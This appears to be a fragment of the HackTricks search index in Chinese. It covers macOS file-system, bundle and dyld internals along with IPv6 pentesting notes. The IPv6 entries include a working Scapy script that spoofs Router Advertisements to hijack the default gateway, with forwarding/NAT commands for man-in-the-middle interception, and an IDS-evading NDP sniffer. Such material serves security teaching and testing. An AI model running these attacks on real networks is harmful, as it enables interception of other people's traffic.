黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 参考文献","id":"2214","title":"参考文献"},"2215":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS File Extension & URL scheme app handlers » macOS 文件扩展名和 URL 方案应用程序处理程序","id":"2215","title":"macOS 文件扩展名和 URL 方案应用程序处理程序"},"2216":{"body":"这是一个包含 macOS 中所有已安装应用程序的数据库,可以查询以获取有关每个已安装应用程序的信息,例如它支持的 URL 方案和 MIME 类型。 可以使用以下命令导出此数据库: /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump 或使用工具 lsdtrip 。 /usr/libexec/lsd 是数据库的核心。它提供 多个 XPC 服务 ,如 .lsd.installation、.lsd.open、.lsd.openurl 等。但它也 要求某些权限 以便应用程序能够使用暴露的 XPC 功能,如 .launchservices.changedefaulthandler 或 .launchservices.changeurlschemehandler 来更改 MIME 类型或 URL 方案的默认应用程序等。 /System/Library/CoreServices/launchservicesd 声明服务 com.apple.coreservices.launchservicesd,可以查询以获取有关正在运行的应用程序的信息。可以使用系统工具 / usr/bin/lsappinfo 或 lsdtrip 进行查询。","breadcrumbs":"macOS Security & Privilege Escalation » macOS File Extension & URL scheme app handlers » LaunchServices 数据库","id":"2216","title":"LaunchServices 数据库"},"2217":{"body":"以下行可以用于查找可以根据扩展名打开文件的应用程序: bash /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E \\"path:|bindings:|name:\\" 或者使用类似于 SwiftDefaultApps : bash ./swda getSchemes #Get all the available schemes\\n./swda getApps #Get all the apps declared\\n./swda getUTIs #Get all the UTIs\\n./swda getHandler --URL ftp #Get ftp handler 您还可以通过以下方式检查应用程序支持的扩展: cd /Applications/Safari.app/Contents\\ngrep -A3 CFBundleTypeExtensions Info.plist | grep string\\ncss\\npdf\\nwebarchive\\nwebbookmark\\nwebhistory\\nwebloc\\ndownload\\nsafariextz\\ngif\\nhtml\\nhtm\\njs\\njpg\\njpeg\\njp2\\ntxt\\ntext\\npng\\ntiff\\ntif\\nurl\\nico\\nxhtml\\nxht\\nxml\\nxbl\\nsvg tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS File Extension & URL scheme app handlers » 文件扩展名和 URL 方案应用程序处理程序","id":"2217","title":"文件扩展名和 URL 方案应用程序处理程序"},"2218":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS 文件、文件夹、二进制文件和内存","id":"2218","title":"macOS 文件、文件夹、二进制文件和内存"},"2219":{"body":"/Applications : 安装的应用程序应在此处。所有用户都可以访问它们。 /bin : 命令行二进制文件 /cores : 如果存在,用于存储核心转储 /dev : 一切都被视为文件,因此您可能会看到存储在此处的硬件设备。 /etc : 配置文件 /Library : 可以在此找到许多与偏好设置、缓存和日志相关的子目录和文件。根目录和每个用户目录中都有一个 Library 文件夹。 /private : 未记录,但许多提到的文件夹是指向私有目录的符号链接。 /sbin : 重要的系统二进制文件(与管理相关) /System : 使 OS X 运行的文件。您在此处主要会找到 Apple 特定的文件(而非第三方)。 /tmp : 文件在 3 天后被删除(这是指向 /private/tmp 的软链接) /Users : 用户的主目录。 /usr : 配置和系统二进制文件 /var : 日志文件 /Volumes : 挂载的驱动器将在此处出现。 /.vol : 运行 stat a.txt 您将获得类似 16777223 7545753 -rw-r--r-- 1 username wheel ... 的内容,其中第一个数字是文件所在卷的 ID 号,第二个是 inode 号。您可以通过 /.vol/ 使用该信息访问此文件的内容,运行 cat /.vol/16777223/7545753","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 文件层次结构","id":"2219","title":"文件层次结构"},"222":{"body":"在玩弄 IPv6 流量之前,建议对您的设备进行加固,以避免被自己的测试所污染,并在大规模数据包注入/嗅探期间获得最佳性能。 bash # Enable promiscuous mode to capture all frames\\nsudo ip link set dev eth0 promisc on # Ignore rogue Router Advertisements & Redirects coming from the segment\\nsudo sysctl -w net.ipv6.conf.all.accept_ra=0\\nsudo sysctl -w net.ipv6.conf.all.accept_redirects=0 # Increase fd / backlog limits when generating lots of traffic\\nsudo sysctl -w fs.file-max=100000\\nsudo sysctl -w net.core.somaxconn=65535\\nsudo sysctl -w net.ipv4.tcp_tw_reuse=1","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 为稳定实验室进行系统调优","id":"222","title":"为稳定实验室进行系统调优"},"2220":{"body":"系统应用程序 位于 /System/Applications 下 已安装 的应用程序通常安装在 /Applications 或 ~/Applications 中 应用程序数据 可以在 /Library/Application Support 中找到,适用于以 root 身份运行的应用程序,以及在 ~/Library/Application Support 中找到,适用于以用户身份运行的应用程序。 第三方应用程序 守护进程 需要以 root 身份运行,通常位于 /Library/PrivilegedHelperTools/ 沙盒 应用程序映射到 ~/Library/Containers 文件夹。每个应用程序都有一个根据应用程序的包 ID 命名的文件夹(com.apple.Safari)。 内核 位于 /System/Library/Kernels/kernel Apple 的内核扩展 位于 /System/Library/Extensions 第三方内核扩展 存储在 /Library/Extensions","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 应用程序文件夹","id":"2220","title":"应用程序文件夹"},"2221":{"body":"MacOS 在多个地方存储信息,例如密码: macOS Sensitive Locations & Interesting Daemons","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 包含敏感信息的文件","id":"2221","title":"包含敏感信息的文件"},"2222":{"body":"macOS Installers Abuse","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 易受攻击的 pkg 安装程序","id":"2222","title":"易受攻击的 pkg 安装程序"},"2223":{"body":".dmg : Apple 磁盘映像文件在安装程序中非常常见。 .kext : 必须遵循特定结构,是 OS X 版本的驱动程序。(这是一个包) .plist : 也称为属性列表,以 XML 或二进制格式存储信息。 可以是 XML 或二进制。二进制文件可以使用以下命令读取: defaults read config.plist /usr/libexec/PlistBuddy -c print config.plsit plutil -p ~/Library/Preferences/com.apple.screensaver.plist plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o - plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o - .app : Apple 应用程序,遵循目录结构(这是一个包)。 .dylib : 动态库(如 Windows DLL 文件) .pkg : 与 xar(可扩展归档格式)相同。安装命令可用于安装这些文件的内容。 .DS_Store : 此文件位于每个目录中,保存目录的属性和自定义设置。 .Spotlight-V100 : 此文件夹出现在系统中每个卷的根目录上。 .metadata_never_index : 如果此文件位于卷的根目录,Spotlight 将不会索引该卷。 .noindex : 具有此扩展名的文件和文件夹将不会被 Spotlight 索引。 .sdef : 包内的文件,指定如何通过 AppleScript 与应用程序进行交互。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » OS X 特定扩展","id":"2223","title":"OS X 特定扩展"},"2224":{"body":"包是一个 目录 ,在 Finder 中 看起来像一个对象 (包的示例是 *.app 文件)。 macOS Bundles","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS 包","id":"2224","title":"macOS 包"},"2225":{"body":"在 macOS(和 iOS)中,所有系统共享库,如框架和 dylibs, 合并为一个单一文件 ,称为 dyld 共享缓存 。这提高了性能,因为代码可以更快地加载。 在 macOS 中,这位于 /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/,在旧版本中,您可能会在 /System/Library/dyld/ 中找到 共享缓存 。 在 iOS 中,您可以在 /System/Library/Caches/com.apple.dyld/ 中找到它们。 与 dyld 共享缓存类似,内核和内核扩展也被编译到内核缓存中,在启动时加载。 为了从单一文件 dylib 共享缓存中提取库,可以使用二进制文件 dyld_shared_cache_util ,虽然现在可能无法使用,但您也可以使用 dyldextractor : bash # dyld_shared_cache_util\\ndyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e # dyldextractor\\ndyldex -l [dyld_shared_cache_path] # List libraries\\ndyldex_all [dyld_shared_cache_path] # Extract all\\n# More options inside the readme tip 请注意,即使 dyld_shared_cache_util 工具无法工作,您也可以将 共享的 dyld 二进制文件传递给 Hopper ,Hopper 将能够识别所有库并让您 选择要调查的库 : 一些提取器可能无法工作,因为 dylibs 是与硬编码地址预链接的,因此它们可能会跳转到未知地址。 tip 还可以通过在 Xcode 中使用模拟器下载其他 *OS 设备的共享库缓存。它们将下载到:ls $HOME/Library/Developer/Xcode/<*>OS\\\\ DeviceSupport//Symbols/System/Library/Caches/com.apple.dyld/,例如:$HOME/Library/Developer/Xcode/iOS\\\\ DeviceSupport/14.1\\\\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Dyld 共享库缓存 (SLC)","id":"2225","title":"Dyld 共享库缓存 (SLC)"},"2226":{"body":"dyld 使用系统调用 shared_region_check_np 来知道 SLC 是否已被映射(返回地址),并使用 shared_region_map_and_slide_np 来映射 SLC。 请注意,即使 SLC 在第一次使用时被滑动,所有 进程 也使用 相同的副本 ,这 消除了 ASLR 保护,如果攻击者能够在系统中运行进程。这在过去实际上被利用过,并通过共享区域分页器修复。 分支池是小的 Mach-O dylibs,它在映像映射之间创建小空间,使得无法插入函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 映射 SLC","id":"2226","title":"映射 SLC"},"2227":{"body":"使用环境变量: DYLD_DHARED_REGION=private DYLD_SHARED_CACHE_DIR= DYLD_SHARED_CACHE_DONT_VALIDATE=1 -> 这将允许加载新的共享库缓存 DYLD_SHARED_CACHE_DIR=avoid 并手动用指向共享缓存的符号链接替换库与真实库(您需要提取它们)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 覆盖 SLCs","id":"2227","title":"覆盖 SLCs"},"2228":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 特殊文件权限","id":"2228","title":"特殊文件权限"},"2229":{"body":"在一个 文件夹 中, 读取 允许 列出它 , 写入 允许 删除 和 写入 文件, 执行 允许 遍历 目录。因此,例如,具有 文件的读取权限 的用户在一个他 没有执行 权限的目录中 将无法读取 该文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 文件夹权限","id":"2229","title":"文件夹权限"},"223":{"body":"因为每个 IPv6 主机 自动加入多个组播组 (ff02::1, ff02::2, …) 并使用 ICMPv6 进行 SLAAC/NDP,你可以在不发送任何数据包的情况下映射整个段。以下 Python/Scapy 单行代码监听最有趣的 L2 消息,并打印出带有颜色和时间戳的日志,显示谁是谁: python #!/usr/bin/env python3\\nfrom scapy.all import *\\nfrom scapy.layers.dhcp6 import *\\nfrom datetime import datetime\\nfrom colorama import Fore, Style, init\\nimport argparse init(autoreset=True) # Human-readable names for protocols we care about\\nDHCP6_TYPES = {\\nDHCP6_Solicit: \'Solicit\',\\nDHCP6_Advertise: \'Advertise\',\\nDHCP6_Request: \'Request\',\\nDHCP6_Reply: \'Reply\',\\nDHCP6_Renew: \'Renew\',\\nDHCP6_Rebind: \'Rebind\',\\nDHCP6_RelayForward:\'Relay-Forward\',\\nDHCP6_RelayReply: \'Relay-Reply\'\\n}\\nICMP6_TYPES = {\\nICMPv6ND_RS: (\'Router Solicitation\', Fore.CYAN),\\nICMPv6ND_RA: (\'Router Advertisement\', Fore.GREEN),\\nICMPv6ND_NS: (\'Neighbor Solicitation\',Fore.BLUE),\\nICMPv6ND_NA: (\'Neighbor Advertisement\',Fore.MAGENTA),\\nICMPv6ND_Redirect:(\'Redirect\', Fore.LIGHTRED_EX),\\nICMPv6MLReport: (\'MLD Report\', Fore.LIGHTCYAN_EX),\\nICMPv6MLReport2: (\'MLD Report\', Fore.LIGHTCYAN_EX),\\nICMPv6MLDone: (\'MLD Done\', Fore.LIGHTCYAN_EX),\\nICMPv6EchoRequest:(\'Echo Request\', Fore.LIGHTBLACK_EX),\\nICMPv6EchoReply: (\'Echo Reply\', Fore.LIGHTBLACK_EX)\\n} def handler(pkt):\\neth_src = pkt[Ether].src if Ether in pkt else \'?\'\\neth_dst = pkt[Ether].dst if Ether in pkt else \'?\'\\nip6_src = pkt[IPv6].src if IPv6 in pkt else \'?\'\\nip6_dst = pkt[IPv6].dst if IPv6 in pkt else \'?\' # Identify protocol family first\\nfor proto,(desc,color) in ICMP6_TYPES.items():\\nif proto in pkt:\\nbreak\\nelse:\\nif UDP in pkt and pkt[UDP].dport == 547: # DHCPv6 server port\\nfor dhcp_t,name in DHCP6_TYPES.items():\\nif dhcp_t in pkt:\\ndesc = \'DHCPv6 – \'+name; color = Fore.YELLOW; break\\nelse:\\nreturn # not a DHCPv6 message we track\\nelse:\\nreturn # not interesting print(color + f\\"[{datetime.now().strftime(\'%H:%M:%S\')}] {desc}\\")\\nprint(f\\" MAC {eth_src} -> {eth_dst}\\")\\nprint(f\\" IPv6 {ip6_src} -> {ip6_dst}\\")\\nprint(\'-\'*60) if __name__ == \'__main__\':\\nargp = argparse.ArgumentParser(description=\'IPv6 NDP & DHCPv6 sniffer\')\\nargp.add_argument(\'-i\',\'--interface\',required=True,help=\'Interface to sniff\')\\nargp.add_argument(\'-t\',\'--time\',type=int,default=0,help=\'Duration (0 = infinite)\')\\na = argp.parse_args()\\nsniff(iface=a.interface,prn=handler,timeout=a.time or None,store=0) 结果:在几秒钟内生成一个完整的 link-local topology (MAC ⇄ IPv6),而不会触发依赖于主动扫描的 IPS/IDS 系统。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 被动 NDP 和 DHCPv6 嗅探","id":"223","title":"被动 NDP 和 DHCPv6 嗅探"},"2230":{"body":"在文件中可以设置一些标志,这将使文件表现得不同。您可以使用 ls -lO /path/directory 检查文件的标志 。 uchg :被称为 uchange 标志将 防止任何操作 更改或删除 文件 。要设置它,请执行:chflags uchg file.txt 根用户可以 删除标志 并修改文件 restricted :此标志使文件 受到 SIP 保护 (您无法将此标志添加到文件)。 Sticky bit :如果目录具有粘滞位, 只有 该 目录的所有者或根用户可以重命名或删除 文件。通常,这在 /tmp 目录上设置,以防止普通用户删除或移动其他用户的文件。 所有标志可以在文件 sys/stat.h 中找到(使用 mdfind stat.h | grep stat.h 查找)并且是: UF_SETTABLE 0x0000ffff: 可更改的所有者标志的掩码。 UF_NODUMP 0x00000001: 不转储文件。 UF_IMMUTABLE 0x00000002: 文件不可更改。 UF_APPEND 0x00000004: 对文件的写入只能追加。 UF_OPAQUE 0x00000008: 目录在联合方面是透明的。 UF_COMPRESSED 0x00000020: 文件被压缩(某些文件系统)。 UF_TRACKED 0x00000040: 对于设置了此标志的文件,不会有删除/重命名的通知。 UF_DATAVAULT 0x00000080: 读取和写入需要权限。 UF_HIDDEN 0x00008000: 提示该项不应在 GUI 中显示。 SF_SUPPORTED 0x009f0000: 超级用户支持标志的掩码。 SF_SETTABLE 0x3fff0000: 超级用户可更改标志的掩码。 SF_SYNTHETIC 0xc0000000: 系统只读合成标志的掩码。 SF_ARCHIVED 0x00010000: 文件已归档。 SF_IMMUTABLE 0x00020000: 文件不可更改。 SF_APPEND 0x00040000: 对文件的写入只能追加。 SF_RESTRICTED 0x00080000: 写入需要权限。 SF_NOUNLINK 0x00100000: 项目不可被移除、重命名或挂载。 SF_FIRMLINK 0x00800000: 文件是一个 firmlink。 SF_DATALESS 0x40000000: 文件是无数据对象。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 标志修饰符","id":"2230","title":"标志修饰符"},"2231":{"body":"文件 ACLs 包含 ACE (访问控制条目),可以为不同用户分配更 细粒度的权限 。 可以授予 目录 这些权限:list、search、add_file、add_subdirectory、delete_child、delete_child。 而对于 文件 :read、write、append、execute。 当文件包含 ACLs 时,您将在列出权限时 看到一个 \\"+\\" ,例如: bash ls -ld Movies\\ndrwx------+ 7 username staff 224 15 Apr 19:42 Movies 您可以使用以下命令 读取文件的ACL : bash ls -lde Movies\\ndrwx------+ 7 username staff 224 15 Apr 19:42 Movies\\n0: group:everyone deny delete 您可以使用(这非常慢)找到 所有带有 ACL 的文件 : bash ls -RAle / 2>/dev/null | grep -E -B1 \\"\\\\d: \\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 文件 ACLs","id":"2231","title":"文件 ACLs"},"2232":{"body":"扩展属性具有名称和任何所需的值,可以使用 ls -@ 查看,并使用 xattr 命令进行操作。一些常见的扩展属性包括: com.apple.resourceFork: 资源分叉兼容性。也可显示为 filename/..namedfork/rsrc com.apple.quarantine: MacOS: Gatekeeper 隔离机制 (III/6) metadata:*: MacOS: 各种元数据,例如 _backup_excludeItem 或 kMD* com.apple.lastuseddate (#PS): 最后文件使用日期 com.apple.FinderInfo: MacOS: Finder 信息(例如,颜色标签) com.apple.TextEncoding: 指定 ASCII 文本文件的文本编码 com.apple.logd.metadata: logd 在 /var/db/diagnostics 中使用的文件 com.apple.genstore.*: 代际存储(文件系统根目录中的 /.DocumentRevisions-V100) com.apple.rootless: MacOS: 由系统完整性保护用于标记文件 (III/10) com.apple.uuidb.boot-uuid: logd 对具有唯一 UUID 的启动时期的标记 com.apple.decmpfs: MacOS: 透明文件压缩 (II/7) com.apple.cprotect: *OS: 每个文件的加密数据 (III/11) com.apple.installd.*: *OS: installd 使用的元数据,例如 installType,uniqueInstallID","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 扩展属性","id":"2232","title":"扩展属性"},"2233":{"body":"这是一种在 MacOS 机器中获取 备用数据流 的方法。您可以通过将内容保存在名为 com.apple.ResourceFork 的扩展属性中,将其保存在 file/..namedfork/rsrc 中。 bash echo \\"Hello\\" > a.txt\\necho \\"Hello Mac ADS\\" > a.txt/..namedfork/rsrc xattr -l a.txt #Read extended attributes\\ncom.apple.ResourceFork: Hello Mac ADS ls -l a.txt #The file length is still q\\n-rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt 您可以 找到所有包含此扩展属性的文件 : bash find / -type f -exec ls -ld {} \\\\; 2>/dev/null | grep -E \\"[x\\\\-]@ \\" | awk \'{printf $9; printf \\"\\\\n\\"}\' | xargs -I {} xattr -lv {} | grep \\"com.apple.ResourceFork\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 资源分叉 | macOS ADS","id":"2233","title":"资源分叉 | macOS ADS"},"2234":{"body":"扩展属性 com.apple.decmpfs 表示文件是加密存储的,ls -l 将报告 大小为 0 ,压缩数据存储在此属性中。每当访问该文件时,它将在内存中解密。 可以使用 ls -lO 查看此属性,标记为压缩,因为压缩文件也带有标志 UF_COMPRESSED。如果通过 chflags nocompressed 删除压缩文件的此标志,系统将不知道该文件是压缩的,因此无法解压并访问数据(它会认为文件实际上是空的)。 工具 afscexpand 可用于强制解压文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » decmpfs","id":"2234","title":"decmpfs"},"2235":{"body":"Mac OS 二进制文件通常被编译为 universal binaries 。一个 universal binary 可以 在同一文件中支持多种架构 。 macOS Universal binaries & Mach-O Format","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Universal binaries & Mach-o Format","id":"2235","title":"Universal binaries & Mach-o Format"},"2236":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Process Memory","id":"2236","title":"macOS Process Memory"},"2237":{"body":"macOS Memory Dumping","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS memory dumping","id":"2237","title":"macOS memory dumping"},"2238":{"body":"目录 /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System 存储有关 不同文件扩展名相关风险的信息 。该目录将文件分类为不同的风险级别,影响 Safari 下载这些文件时的处理方式。类别如下: LSRiskCategorySafe :此类别中的文件被认为是 完全安全的 。Safari 会在下载后自动打开这些文件。 LSRiskCategoryNeutral :这些文件没有警告,Safari 不会自动打开 。 LSRiskCategoryUnsafeExecutable :此类别下的文件 触发警告 ,指示该文件是一个应用程序。这是一个安全措施,用于提醒用户。 LSRiskCategoryMayContainUnsafeExecutable :此类别适用于可能包含可执行文件的文件,例如归档文件。除非 Safari 能验证所有内容是安全或中性的,否则将 触发警告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Risk Category Files Mac OS","id":"2238","title":"Risk Category Files Mac OS"},"2239":{"body":"$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 :包含有关下载文件的信息,例如下载来源的 URL。 /var/log/system.log :OSX 系统的主日志。com.apple.syslogd.plist 负责执行 syslogging(您可以通过在 launchctl list 中查找 \\"com.apple.syslogd\\" 来检查它是否被禁用)。 /private/var/log/asl/*.asl :这些是 Apple 系统日志,可能包含有趣的信息。 $HOME/Library/Preferences/com.apple.recentitems.plist :通过 \\"Finder\\" 存储最近访问的文件和应用程序。 $HOME/Library/Preferences/com.apple.loginitems.plsit :存储系统启动时要启动的项目。 $HOME/Library/Logs/DiskUtility.log :DiskUtility 应用程序的日志文件(有关驱动器的信息,包括 USB)。 /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist :有关无线接入点的数据。 /private/var/db/launchd.db/com.apple.launchd/overrides.plist :已停用的守护进程列表。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » Log files","id":"2239","title":"Log files"},"224":{"body":"IPv6 主机依赖 ICMPv6 Router Advertisements 进行默认网关发现。如果你注入伪造的 RAs 比合法路由器更频繁 ,设备将默默地切换到你作为网关。 python #!/usr/bin/env python3\\nfrom scapy.all import *\\nimport argparse p = argparse.ArgumentParser()\\np.add_argument(\'-i\',\'--interface\',required=True)\\np.add_argument(\'-m\',\'--mac\',required=True,help=\'Source MAC (will be put in SrcLL option)\')\\np.add_argument(\'--llip\',required=True,help=\'Link-local source IP, e.g. fe80::dead:beef\')\\np.add_argument(\'-l\',\'--lifetime\',type=int,default=1800,help=\'Router lifetime\')\\np.add_argument(\'--interval\',type=int,default=5,help=\'Seconds between RAs\')\\np.add_argument(\'--revert\',action=\'store_true\',help=\'Send lifetime=0 to undo attack\')\\nargs = p.parse_args() lifetime = 0 if args.revert else args.lifetime\\nra = (IPv6(src=args.llip,dst=\'ff02::1\',hlim=255)/\\nICMPv6ND_RA(routerlifetime=lifetime, prf=0x1)/ # High preference\\nICMPv6NDOptSrcLLAddr(lladdr=args.mac)) send(ra,iface=args.interface,loop=1,inter=args.interval) 要在赢得比赛后实际 转发流量 : bash sudo sysctl -w net.ipv6.conf.all.forwarding=1\\nsudo ip6tables -A FORWARD -i eth0 -j ACCEPT\\nsudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 路由器广告标志 (M/O) 和默认路由器优先级 (Prf) 标志 意义 对客户端行为的影响 M (管理地址配置) 当设置为 1 时,主机必须使用 DHCPv6 来获取其 IPv6 地址。 整个地址来自 DHCPv6 – 非常适合 mitm6 风格的中间人攻击。 O (其他配置) 当设置为 1 时,主机应仅使用 DHCPv6 来获取 其他 信息(DNS, NTP, …)。 地址仍通过 SLAAC 获取,但 DNS 可以通过 DHCPv6 被劫持。 M=0 / O=0 纯 SLAAC 网络。 仅可能使用 RA / RDNSS 技巧 – 客户端不会发送 DHCPv6。 M=1 / O=1 混合环境。 同时使用 DHCPv6 和 SLAAC;欺骗的表面最大。 在渗透测试期间,您可以简单地检查一次合法的 RA 并决定哪个向量是可行的: bash sudo tcpdump -vvv -i eth0 \'icmp6 && ip6[40] == 134\' # capture Router Advertisements 查找转储中的 flags [M,O] 字段 - 无需猜测。 Prf (路由器优先级)字段在 RA 头部控制当存在 多个 网关时你的恶意路由器看起来有多吸引人: Prf 值 二进制 意义 高 10 客户端更喜欢这个路由器而不是任何 中 / 低 的路由器 中(默认) 01 几乎所有合法设备都使用 低 00 仅在没有更好的路由器时选择 使用 Scapy 生成数据包时,可以通过 prf 参数设置,如上所示(prf=0x1 → 高)。结合 高 Prf 、 短间隔 和 非零生命周期 使你的恶意网关异常稳定。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 路由器广告 (RA) 欺骗","id":"224","title":"路由器广告 (RA) 欺骗"},"2240":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » macOS Bundles","id":"2240","title":"macOS Bundles"},"2241":{"body":"macOS 中的 Bundles 作为各种资源的容器,包括应用程序、库和其他必要文件,使它们在 Finder 中看起来像单一对象,例如熟悉的 *.app 文件。最常见的 bundle 是 .app bundle,尽管 .framework、.systemextension 和 .kext 等其他类型也很普遍。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » 基本信息","id":"2241","title":"基本信息"},"2242":{"body":"在 bundle 内,特别是在 .app/Contents/ 目录中,存放着各种重要资源: _CodeSignature : 此目录存储代码签名详细信息,对于验证应用程序的完整性至关重要。您可以使用以下命令检查代码签名信息: %%%bash openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 %%% MacOS : 包含在用户交互时运行的应用程序的可执行二进制文件。 Resources : 应用程序用户界面组件的存储库,包括图像、文档和界面描述(nib/xib 文件)。 Info.plist : 作为应用程序的主要配置文件,对于系统正确识别和与应用程序交互至关重要。 Info.plist 中的重要键 Info.plist 文件是应用程序配置的基石,包含以下键: CFBundleExecutable : 指定位于 Contents/MacOS 目录中的主可执行文件的名称。 CFBundleIdentifier : 提供应用程序的全局标识符,macOS 在应用程序管理中广泛使用。 LSMinimumSystemVersion : 指示运行该应用程序所需的最低 macOS 版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Bundles » Bundle 的基本组成部分","id":"2242","title":"Bundle 的基本组成部分"},"2243":{"body":"要探索 bundle 的内容,例如 Safari.app,可以使用以下命令: bash ls -lR /Applications/Safari.app/Contents 此探索揭示了如 _CodeSignature、MacOS、Resources 等目录,以及如 Info.plist 的文件,每个文件都在保护应用程序、定义其用户界面和操作参数方面发挥独特作用。 其他 Bundle 目录 除了常见目录,bundles 还可能包括: Frameworks : 包含应用程序使用的捆绑框架。框架类似于 dylibs,但具有额外资源。 PlugIns : 用于增强应用程序功能的插件和扩展的目录。 XPCServices : 存放应用程序用于进程间通信的 XPC 服务。 这种结构确保所有必要组件都封装在 bundle 内,促进模块化和安全的应用程序环境。 有关 Info.plist 键及其含义的更多详细信息,Apple 开发者文档提供了广泛的资源: Apple Info.plist Key Reference 。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team 